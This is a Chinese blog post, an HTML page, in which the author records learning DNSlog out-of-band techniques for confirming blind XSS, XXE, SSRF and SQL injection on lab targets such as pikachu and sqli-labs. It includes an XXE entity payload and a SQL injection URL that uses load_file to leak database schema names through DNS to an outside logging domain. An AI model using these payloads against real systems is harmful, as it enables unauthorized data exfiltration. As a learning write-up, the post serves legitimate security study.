

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
 <meta name="referrer" content="no-referrer"/>
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="记录一下DNSlog的学习。">
  <meta name="author" content="Eggs">
  <meta name="keywords" content="Blog">
  
  <title>DNSlog学习 - 蛋窝窝</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/atelier-sulphurpool-light.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/css/diy/diy.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"2693993651.github.io","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":"§ "},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>蛋窝窝 •ᴗ•Hi~</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default0.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="DNSlog学习">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      Eggs
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-05-13 20:22" pubdate>
        2022年5月13日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      13
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">DNSlog学习</h1>
            
            <div class="markdown-body">
              <p>记录一下DNSlog的学习。</p>
<span id="more"></span>

<hr>
<h2 id="0x01验证无回显命令"><a href="#0x01验证无回显命令" class="headerlink" title="0x01验证无回显命令"></a>0x01验证无回显命令</h2><p>如果我们发现了一些无回显的漏洞，如sql盲注，xxs盲注，ssrf，那我们怎么确定payload生效了呢？这时我们可以构造payload使目标服务器发起一次网络请求，如果访问一个我们的站点，那么我们的Web服务器日志里面就会有访问记录，通过查看访问日志里是否有记录就可以确定构造的payload是有否效，如果有记录那么接下来我们就可以执行别的命令了。</p>
<p><em>这也是我之前在xxe盲注中使用的方法</em></p>
<p>这种方法可行，但需要我们有一个在公网的服务器，有点小成本。我们还可以用另一种便宜又方便的方法，通过DNSlog来实现。</p>
<p><em>spoiler：除了可以验证命令是否执行，在sql注入，os命令执行的情况下还能直接看到回显内容，详见后文</em></p>
<h2 id="0x02DNSlog是什么"><a href="#0x02DNSlog是什么" class="headerlink" title="0x02DNSlog是什么"></a>0x02DNSlog是什么</h2><p>字面意思，DNSlog就是DNS的日志服务。DNS将域名解析为真实IP，DNSlog就记录了用户对域名的访问信息。附上工作原理图：<br><img src="https://raw.githubusercontent.com/2693993651/images/master/images/202205132322603.jpg" srcset="/img/loading.gif" lazyload></p>
<p>我们可以用自己的服务器搭建dnslog，也可以用下面推荐的公共免费的dnslog平台。</p>
<figure class="highlight awk"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span>www.dnslog.cn<br>http:<span class="hljs-regexp">//</span>admin.dnslog.link<br>http:<span class="hljs-regexp">//</span>ceye.io<br></code></pre></div></td></tr></table></figure>

<h2 id="0x03利用原理"><a href="#0x03利用原理" class="headerlink" title="0x03利用原理"></a>0x03利用原理</h2><p>现在回到无回显的情况，我们不需要使目标访问一个我们可控制的服务器了，只需要使它访问一个我们可控制的域名，也不能说是“可控制的域名”，意思就是我们控制该域名DNS解析服务。</p>
<p>假设我们现在有个a.com域名，我们将该域名泛解析到我们的DNS服务器上。也就是说我们访问a.a.com、abc.a.com，我们的DNS服务都会解析，dnslog里面也就有对应的记录。</p>
<p>dnslog.cn这个平台就给我们提供了一个xxx.dnslog.cn的域名，然后无论我们访问什么xxx.xxx.dnslog.cn，我们都能在分配给我们域名的DNS服务中的dnslog里面看到对应的记录。</p>
<p>其实说要验证无回显漏洞存不存在，我们也不需要管什么泛解析，直接让目标请求xxx.dnslog.cn，然后我们看有没有记录就行了。但是，因为dns有缓存，当别人来访问我们的域名，第一次会来通过我们的dns解析服务来查询，后面就直接通过缓存而不来查询了。解决办法即使在我们的域名前面一直多加一些东西变成更高一级的域名，让目标一直来找我们的服务解析。另外，sql盲注中我们多加的一级域名也可以变成我们所想要看到的数据内容，利用更进一步。</p>
<h2 id="0x04利用实例"><a href="#0x04利用实例" class="headerlink" title="0x04利用实例"></a>0x04利用实例</h2><h3 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>准备工作</h3><p>以dnslog.cn平台为例，我们先申请一个子域名</p>
<p><img src="https://raw.githubusercontent.com/2693993651/images/master/images/202205141243353.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="xxs验证"><a href="#xxs验证" class="headerlink" title="xxs验证"></a>xxs验证</h3><p>以pikachu中的xxe盲打为例，在这里我们的输入不会有回显，只有管理员页面才能看到。为了验证我们的输入是否执行了xxs脚本命令，输入下图中的内容</p>
<p><img src="https://raw.githubusercontent.com/2693993651/images/master/images/202205141324584.png" srcset="/img/loading.gif" lazyload></p>
<p>然后当管理员查看时</p>
<p><img src="https://raw.githubusercontent.com/2693993651/images/master/images/202205141326429.png" srcset="/img/loading.gif" lazyload></p>
<p>在dnslog平台处有对应的解析记录，证明xxs代码执行</p>
<p><img src="https://raw.githubusercontent.com/2693993651/images/master/images/202205141327204.png" srcset="/img/loading.gif" lazyload></p>
<blockquote>
<h1 id="注意：以下实验均为成功，不知道为什么，还在尝试中"><a href="#注意：以下实验均为成功，不知道为什么，还在尝试中" class="headerlink" title="注意：以下实验均为成功，不知道为什么，还在尝试中"></a>注意：以下实验均为成功，不知道为什么，还在尝试中</h1></blockquote>
<h3 id="xxe验证"><a href="#xxe验证" class="headerlink" title="xxe验证"></a>xxe验证</h3><p>payload：</p>
<figure class="highlight xml"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-meta-keyword">foo</span> [    </span><br><span class="hljs-meta"><span class="hljs-meta">&lt;!ENTITY <span class="hljs-meta-keyword">xxe</span> <span class="hljs-meta-keyword">SYSTEM</span> <span class="hljs-meta-string">&quot;http://blindxxe.nb0zug.dnslog.cn&quot;</span> &gt;</span> ]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">foo</span>&gt;</span><span class="hljs-symbol">&amp;xxe;</span><span class="hljs-tag">&lt;/<span class="hljs-name">foo</span>&gt;</span><br></code></pre></div></td></tr></table></figure>

<p>查看dnslog的解析记录</p>
<h3 id="ssrf"><a href="#ssrf" class="headerlink" title="ssrf"></a>ssrf</h3><p>我们现在看到这里接收HTTP协议的请求，试试将我们刚刚申请的子域名填入</p>
<p>以pikachu的/ssrf/ssrf_curl.php为例，此处有一个接收url的参数</p>
<p><img src="https://raw.githubusercontent.com/2693993651/images/master/images/202205141242575.png" srcset="/img/loading.gif" lazyload></p>
<p>另外，如果dnslog平台有记录也不能证明此处存在ssrf，只能说明能通过该处发送网络请求，能否请求内网还需进一步判断。</p>
<h3 id="sql盲注"><a href="#sql盲注" class="headerlink" title="sql盲注"></a>sql盲注</h3><p>mysql数据库中有这样一个函数： load_file() 。这个函数不仅能加载本地文件，也能对url发起请求。</p>
<p>mysql.ini中secure_file_priv必须为空</p>
<blockquote>
<p>（1）当secure_file_priv为null，不允许导入导出</p>
<p>（2）当secure_file_priv为/tmp导入导出只能在/tmp目录下。</p>
<p>（3）当secure_file_priv为空，则不作限制允许导入导出（注意NULL不是我们要的空，NULL和空的类型不一样）</p>
</blockquote>
<p>且要注意一点：load_file函数在Linux下是无法用来做dnslog攻击的。</p>
<p>使用此函数需要满足以下条件: (1).所读文件必须在服务器上，且必须指定文件其绝对路径 (2).连接当前数据库用户必须有FILE权限 (3).文件内容必须小于max_allowed_packet。</p>
<p>payload</p>
<figure class="highlight llvm"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs llvm">/sqli-labs-master/Less<span class="hljs-number">-5</span>/?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-variable">%27</span><span class="hljs-variable">%20</span><span class="hljs-keyword">and</span><span class="hljs-variable">%20</span>if((<span class="hljs-keyword">select</span><span class="hljs-variable">%20</span>load_file(concat(<span class="hljs-variable">%27</span>\\\\<span class="hljs-variable">%27</span><span class="hljs-punctuation">,</span>(<span class="hljs-keyword">select</span><span class="hljs-variable">%20</span>schema_name<span class="hljs-variable">%20</span>from<span class="hljs-variable">%20</span>information_schema.schemata)<span class="hljs-punctuation">,</span><span class="hljs-variable">%27</span>.waovao.ceye.io\\abc<span class="hljs-variable">%27</span>)))<span class="hljs-punctuation">,</span><span class="hljs-number">1</span><span class="hljs-punctuation">,</span><span class="hljs-number">0</span>)--+<br></code></pre></div></td></tr></table></figure>




            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AD%A6%E4%B9%A0/%E7%BD%91%E5%AE%89/">网安</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/DNSlog/">DNSlog</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/04/18/thinkphp-pop%E9%93%BE/">
                        <span class="hidden-mobile">thinkphp_pop链</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function () {
        new Valine({
          el: "#valine",
          app_id: "DejyuTUMjI2eFz3aDorItWV1-gzGzoHsz",
          app_key: "fuBqYYOE6Y2x4Ssxcxg7OhUW",
          placeholder: "说点什么",
          path: window.location.pathname,
          avatar: "monsterid",
          meta: ["nick"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: true,
          serverURLs: "",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
<div>
  <span id="timeDate">载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("05/14/2021 10:42:10");//此处修改你的建站时间或者网站上线时间
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "🐣孵化中... for&nbsp"+dnum+"&nbspdays";  //此次自定义显示内容
      document.getElementById("times").innerHTML = hnum + "&nbsphr&nbsp" + mnum + "&nbspmin&nbsp" + snum + "&nbspsec";
  }  //此次自定义显示内容
  setInterval("createtime()",250);
  </script>
</div>
<div class="text-center py-1">   
  <div>
    <span>Copyright © 2021</span></a>
    <span>Eggswoo</span></a>    <br>
  </div>
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>














  
<script src="/js/diy/diy.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/caidai.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
